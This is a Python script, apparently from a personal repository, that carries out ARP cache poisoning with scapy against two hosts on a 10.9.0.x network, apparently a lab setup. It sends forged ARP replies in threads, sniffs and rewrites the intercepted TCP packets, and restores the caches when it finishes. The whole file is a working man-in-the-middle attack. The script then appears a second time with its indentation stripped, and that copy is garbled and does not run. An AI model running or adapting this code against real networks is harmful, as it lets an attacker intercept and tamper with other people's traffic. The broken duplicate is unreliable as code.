viz-prakash/arpspoofing.py

## arpspoofing.py
#!/usr/bin/env python3
import concurrent.futures
import subprocess
from time import sleep
from scapy.all import *

IP_A = "10.9.0.5"
MAC_A = "02:42:0a:09:00:05"
IP_B = "10.9.0.6"
MAC_B = "02:42:0a:09:00:06"
MAC_M = "02:42:0a:09:00:69"


QUIT=False

def stop_now(packet):
    return QUIT

def get_MAC(ipaddr, iface="eht0"):
    results, unanswered = sr(ARP(op="who-has", pdst=ipaddr), iface=iface, retry=-5, verbose=0)
    if len(results) > 0:
        return results[0][1].hwsrc
    return None

def spoof(target_ip, target_mac, host, count=0):
    print("Starting the spoof...")
    while (not QUIT):
        #print("in the while, quit value: {}".format(QUIT))
        A = ARP(op="is-at", psrc=host, hwdst=target_mac, pdst=target_ip)
        pkt = send(A, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0])))
        if count > 0:
            sleep(1)
        else:
            sleep(2)
    print("Stopping spoof - {}".format(QUIT))

def restore(target_ip, target_mac, host, host_mac, count=5, only_target=False):
    print("Restoring the poisoned caches...")
    while count:
        A = ARP(op="is-at", hwsrc=host_mac, psrc = host, hwdst=target_mac, pdst=target_ip)
        #print("sending {}".format(repr(A)))
        #send(A)
        pkt = send(A, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0])))
        if only_target:
            continue
        A = ARP(op="is-at", hwsrc=target_mac, psrc=target_ip, hwdst=host_mac, pdst=host)
        #print("sending {}".format(repr(A)))
        #send(A)
        pkt = send(A, verbose=False, return_packets=True)
        print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0])))
        sleep(1)
        count -= 1


def arp_spoofing(target, host, interface="eth0", only_target=False):
    #send ARP request
    #fetch the MAC address from the responses
    target_MAC = get_MAC(target, interface)
    host_MAC = get_MAC(host, interface)
    print("Target's MAC: {}, Host's MAC: {}".format(target_MAC, host_MAC))
    #start the threads to keep spoofing in while loop
    #spoof the target and host (if needed)
    executor = concurrent.futures.ThreadPoolExecutor(max_workers=5)
    future1 = executor.submit(spoof, target, target_MAC, host)
    if not only_target:
        future2 = executor.submit(spoof, host, host_MAC, target)
    def sniff_modify(packet):
        #ls(packet)
        print(repr(packet))
        sleep(1)
        #modification and injecting the packet without ip_forwarding doesn't work
        #TODO: needs to figure out why
        if packet[Ether].src == target_MAC:
            packet[Ether].src = packet[Ether].dst
            packet[Ether].dst = host_MAC
            ip = packet[IP]
            tcp = packet[TCP]
            tcp.dport  = 8000
            tcp.sport = 56999
            print(tcp.options)
            new_opt = []
            for opt in tcp.options:
                if opt[0] == 'SAckOK':
                    continue
                new_opt.append(opt)
            tcp.options = new_opt
            pkt = ip/tcp
            print("packet modified")
            print(repr(packet))
            send(pkt, iface="eth0", )
            print("sent....")
        elif packet[Ether].src == host_MAC:
            packet[Ether].src = packet[Ether].dst
            packet[Ether].dst = target_MAC
            print("packet modified")
            print(repr(packet))
            sendp(packet)
            print("sent....")


    #keep reading data asynchronously and transferring data
    #f = 'ip and ((src {} and dst {}) or (src {} and dst {}))'.format(
    #                target, host, host, target)
    f = 'ether src {} or ether src {}'.format(target_MAC, host_MAC)
    sniff(iface=interface, filter=f, prn=sniff_modify, stop_filter=stop_now)
    global QUIT
    QUIT = True
    restore(target, target_MAC, host, host_MAC)
    print("Done!")

if __name__ == "__main__":
    #cmd = "sysctl net.ipv4.ip_forward=1"
    #subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,shell=True)
    arp_spoofing(target=IP_A,host=IP_B)
	#!/usr/bin/env python3
	import concurrent.futures
	import subprocess
	from time import sleep
	from scapy.all import *

	IP_A = "10.9.0.5"
	MAC_A = "02:42:0a:09:00:05"
	IP_B = "10.9.0.6"
	MAC_B = "02:42:0a:09:00:06"
	MAC_M = "02:42:0a:09:00:69"


	QUIT=False

	def stop_now(packet):
	return QUIT

	def get_MAC(ipaddr, iface="eht0"):
	results, unanswered = sr(ARP(op="who-has", pdst=ipaddr), iface=iface, retry=-5, verbose=0)
	if len(results) > 0:
	return results[0][1].hwsrc
	return None

	def spoof(target_ip, target_mac, host, count=0):
	print("Starting the spoof...")
	while (not QUIT):
	#print("in the while, quit value: {}".format(QUIT))
	A = ARP(op="is-at", psrc=host, hwdst=target_mac, pdst=target_ip)
	pkt = send(A, verbose=False, return_packets=True)
	print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0])))
	if count > 0:
	sleep(1)
	else:
	sleep(2)
	print("Stopping spoof - {}".format(QUIT))

	def restore(target_ip, target_mac, host, host_mac, count=5, only_target=False):
	print("Restoring the poisoned caches...")
	while count:
	A = ARP(op="is-at", hwsrc=host_mac, psrc = host, hwdst=target_mac, pdst=target_ip)
	#print("sending {}".format(repr(A)))
	#send(A)
	pkt = send(A, verbose=False, return_packets=True)
	print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0])))
	if only_target:
	continue
	A = ARP(op="is-at", hwsrc=target_mac, psrc=target_ip, hwdst=host_mac, pdst=host)
	#print("sending {}".format(repr(A)))
	#send(A)
	pkt = send(A, verbose=False, return_packets=True)
	print("sent packet from hwsrc: {} {}".format(A.hwsrc, repr(pkt[0])))
	sleep(1)
	count -= 1



	def arp_spoofing(target, host, interface="eth0", only_target=False):
	#send ARP request
	#fetch the MAC address from the responses
	target_MAC = get_MAC(target, interface)
	host_MAC = get_MAC(host, interface)
	print("Target's MAC: {}, Host's MAC: {}".format(target_MAC, host_MAC))
	#start the threads to keep spoofing in while loop
	#spoof the target and host (if needed)
	executor = concurrent.futures.ThreadPoolExecutor(max_workers=5)
	future1 = executor.submit(spoof, target, target_MAC, host)
	if not only_target:
	future2 = executor.submit(spoof, host, host_MAC, target)
	def sniff_modify(packet):
	#ls(packet)
	print(repr(packet))
	sleep(1)
	#modification and injecting the packet without ip_forwarding doesn't work
	#TODO: needs to figure out why
	if packet[Ether].src == target_MAC:
	packet[Ether].src = packet[Ether].dst
	packet[Ether].dst = host_MAC
	ip = packet[IP]
	tcp = packet[TCP]
	tcp.dport = 8000
	tcp.sport = 56999
	print(tcp.options)
	new_opt = []
	for opt in tcp.options:
	if opt[0] == 'SAckOK':
	continue
	new_opt.append(opt)
	tcp.options = new_opt
	pkt = ip/tcp
	print("packet modified")
	print(repr(packet))
	send(pkt, iface="eth0", )
	print("sent....")
	elif packet[Ether].src == host_MAC:
	packet[Ether].src = packet[Ether].dst
	packet[Ether].dst = target_MAC
	print("packet modified")
	print(repr(packet))
	sendp(packet)
	print("sent....")


	#keep reading data asynchronously and transferring data
	#f = 'ip and ((src {} and dst {}) or (src {} and dst {}))'.format(
	# target, host, host, target)
	f = 'ether src {} or ether src {}'.format(target_MAC, host_MAC)
	sniff(iface=interface, filter=f, prn=sniff_modify, stop_filter=stop_now)
	global QUIT
	QUIT = True
	restore(target, target_MAC, host, host_MAC)
	print("Done!")

	if __name__ == "__main__":
	#cmd = "sysctl net.ipv4.ip_forward=1"
	#subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,shell=True)
	arp_spoofing(target=IP_A,host=IP_B)